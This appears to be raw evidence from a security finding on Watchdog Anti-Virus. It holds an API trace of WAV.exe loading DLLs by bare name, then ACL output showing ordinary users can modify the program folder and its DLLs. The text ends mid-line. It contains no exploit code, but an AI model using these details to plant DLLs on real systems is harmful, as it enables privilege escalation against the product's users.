WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.AccessControl.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.Win32.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Sciter.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryA,LPCSTR: powrprof.dll
WAV.exe,LoadLibraryExA,LPCSTR: powrprof.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : powrprof.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\powrprof.dll, LPCSTR: PowerRegisterSuspendResumeNotification
WAV.exe,LoadLibraryA,LPCSTR: ws2_32.dll
WAV.exe,LoadLibraryExA,LPCSTR: ws2_32.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : ws2_32.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: GetHostNameW
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.SDK.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\wsdk-antivirus.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_init
WAV.exe,LoadLibraryExA,LPCSTR: winhttp.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : winhttp.dll, dwFlags : NONE
WAV.exe,LoadLibraryA,LPCSTR: libclamav.dll
WAV.exe,LoadLibraryExA,LPCSTR: libclamav.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libclamav.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamav.dll, LPCSTR: cl_init
WAV.exe,LoadLibraryA,LPCSTR: libclamunrar_iface.dll.9.0.4
WAV.exe,LoadLibraryExA,LPCSTR: libclamunrar_iface.dll.9.0.4, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libclamunrar_iface.dll.9.0.4, dwFlags : NONE
WAV.exe,LoadLibraryA,LPCSTR: libclamunrar_iface.dll.9
WAV.exe,LoadLibraryExA,LPCSTR: libclamunrar_iface.dll.9, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libclamunrar_iface.dll.9, dwFlags : NONE
WAV.exe,LoadLibraryA,LPCSTR: libclamunrar_iface.dll
WAV.exe,LoadLibraryExA,LPCSTR: libclamunrar_iface.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libclamunrar_iface.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_open
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_peek_file_header
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_extract_file
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_skip_file
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_close
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamav.dll, LPCSTR: cl_engine_new
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamav.dll, LPCSTR: cl_load
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_set_settings
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\secur32.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Cryptography.Algorithms.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Cryptography.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Netapi32.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\Netapi32.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : Netapi32.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\Netapi32.dll, LPCSTR: NetGetJoinInformationW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\Netapi32.dll, LPCSTR: NetGetJoinInformation
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Requests.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.ServicePoint.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.WebHeaderCollection.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Http.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\winhttp.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpGetIEProxyConfigForCurrentUserW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpGetIEProxyConfigForCurrentUser
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.Tracing.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpOpenW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpOpen
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Security.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpGetProxyForUrlW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpGetProxyForUrl
WAV.exe,LoadLibraryExW,LPCWSTR : dxgi.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : d3d11.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : sspicli.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Cryptography.X509Certificates.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.DiagnosticSource.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Claims.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : mscms.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Sockets.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\ws2_32.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSAStartup
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketWW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: closesocket
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketWW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketWW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: setsockopt
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: setsockopt
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.NameResolution.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSAStartup
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: GetAddrInfoW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: FreeAddrInfoW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: getsockopt
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSAConnect
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.ThreadPool.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\sspicli.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: EnumerateSecurityPackagesW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: FreeContextBuffer
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.Process.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: AcquireCredentialsHandleW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: InitializeSecurityContextW
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_get_version
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.Overlapped.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASend
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSARecv
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: QueryContextAttributesW
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Cryptography.Encoding.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: EncryptMessage
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: send
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: recv
WAV.exe,LoadLibraryExW,LPCWSTR : dwrite.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: DecryptMessage
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: DeleteSecurityContext
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: shutdown
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_InflateEnd
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_disable_realtime
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_auto_update_enable
WAV.exe,LoadLibraryA,LPCSTR: libfreshclam.dll
WAV.exe,LoadLibraryExA,LPCSTR: libfreshclam.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libfreshclam.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: FreeCredentialsHandle
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_strerror
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_initialize
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_cleanup
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_prune_database_directory
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_test_database
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_dns_query_update_info
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_download_url_database
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_download_url_databases
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_update_database
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_update_databases
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
Raw
File_ACLs.txt
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\DefaultDatabases
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\C
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\crashpad_handler.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\IEShims.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\libcrypto-1_1-x64.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\libssl-1_1-x64.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\log4cpp.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
